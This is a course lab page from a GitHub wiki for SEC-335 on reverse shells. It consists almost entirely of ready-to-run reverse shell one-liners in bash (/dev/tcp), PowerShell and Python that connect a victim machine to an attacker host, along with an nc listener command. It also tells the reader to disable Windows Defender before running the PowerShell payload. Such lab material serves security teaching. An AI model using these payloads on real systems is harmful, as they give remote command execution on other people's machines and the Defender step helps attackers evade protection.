Lab 8.2: Reverse Shell - Paiet/SEC-335 GitHub Wiki

Bash Reverse Shell

Command: /bin/bash -i >& /dev/tcp/AttackerIP/PORT 0>&1
To test this, open a port on your Kali (attacker) machine using the following command: nc -nvl -p 4449
Once the port is open, you can run the first command on the attacked machine,

and then you will have a reverse shell

Once Defender is disabled, run, run cmd.exe in a PowerShell window to be able to run the following: powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Remember to change the 'ATTACKERIP' and 'ATTACKERPORT' in the code above before executing

python3 -c 'import socket; from subprocess import run; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.5.58",4444)); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);run(["/bin/bash","-i"]);' [Source](https://www.linuxfordevices.com/tutorials/shell-script/reverse-shell-in-python)